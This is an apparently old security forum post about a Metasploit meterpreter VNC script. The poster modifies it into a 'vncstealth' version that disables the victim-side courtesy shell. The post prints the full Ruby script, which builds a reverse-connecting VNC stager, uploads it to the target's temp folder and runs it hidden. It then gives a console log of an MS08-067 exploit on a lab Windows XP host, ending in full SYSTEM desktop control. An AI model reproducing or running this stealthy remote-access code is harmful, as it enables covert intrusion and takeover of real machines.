msf vnc courtesy shell
I've been testing the new vnc meterpreter script hdm just wrote, as per:
Twitter / HD Moore: RunVNC: quickly spawn a V ...
It works just fine. However, it pops a courtesy shell, so I added:
just before executing the exploit. The parameter was properly echoed. But the courtesy shell keeps showing.Code:set DisableCourtesyShell TRUE
Has anyone else tried this?
Edit. Possibly this is due it's a meterpreter script, not a payload. Just wondering if there's a command available to disable it.
Edit 2.
Ok, guys, flooded by replies
Nevermind, I modified the original script vnc.rb as follows:
Then, saved as:Code:# $Id: vnc.rb 7872 2009-12-15 05:10:33Z hdm $ # # Meterpreter script for obtaining a quick VNC session # session = client # # Options # opts = Rex::Parser::Arguments.new( "-h" => [ false, "This help menu"], "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], "-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4545)"], "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"] ) # # Default parameters # rhost = Rex::Socket.source_address("1.2.3.4") rport = 4545 autoconn = true # # Option parsing # opts.parse(args) do |opt, idx, val| case opt when "-h" print_line(opts.usage) return when "-r" rhost = val when "-p" rport = val.to_i when "-D" autoconn = false end end # # Create the agent EXE # print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})") pay = client.framework.payloads.create("windows/vncinject/reverse_tcp") pay.datastore['LHOST'] = rhost pay.datastore['LPORT'] = rport raw = pay.generate exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw) print_status("VNC stager executable #{exe.length} bytes long") # # Upload to the filesystem # tempdir = client.fs.file.expand_path("%TEMP%") tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" tempexe.gsub!("\\\\", "\\") fd = client.fs.file.new(tempexe, "wb") fd.write(exe) fd.close print_status("Uploaded the VNC agent to #{tempexe} (must be deleted manually)") # # Setup the multi/handler if requested # if(autoconn) mul = client.framework.exploits.create("multi/handler") mul.datastore['PAYLOAD'] = "windows/vncinject/reverse_tcp" mul.datastore['LHOST'] = rhost mul.datastore['LPORT'] = rport mul.datastore['EXITFUNC'] = 'process' mul.datastore['ExitOnSession'] = true mul.datastore['DisableCourtesyShell'] = true mul.exploit_simple( 'Payload' => mul.datastore['PAYLOAD'], 'RunAsJob' => true ) end # # Execute the agent # print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...") proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
And tested it:Code:/pentest/exploits/framework3/scripts/meterpreter/vncstealth.rb
It's bloody silent now. No pop-up courtesy shell.Code:_ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___) |_| =[ metasploit v3.3.3-dev [core:3.3 api:1.0] + -- --=[ 476 exploits - 220 auxiliary + -- --=[ 262 payloads - 22 encoders - 8 nops =[ svn r7893 updated today (2009.12.16) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2 RHOST => 192.168.1.2 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.1.6 LHOST => 192.168.1.6 msf exploit(ms08_067_netapi) > set LPORT 4444 LPORT => 4444 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on port 4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:English[*] Selected Target: Windows XP SP2 English (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.2:1035) meterpreter > run vncstealth[*] Creating a VNC stager: LHOST=192.168.1.6 LPORT=4545)[*] VNC stager executable 87552 bytes long[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\udoGvQNkBM.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 192.168.1.6:4545...[*] VNC Server session 2 opened (192.168.1.6:4545 -> 192.168.1.2:1036) meterpreter > Connected to RFB server, using protocol version 3.3 No authentication needed Desktop name "VNCShell [SYSTEM@LAB-VICTIM] - Full Access" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using shared memory PutImage Same machine: preferring raw encoding
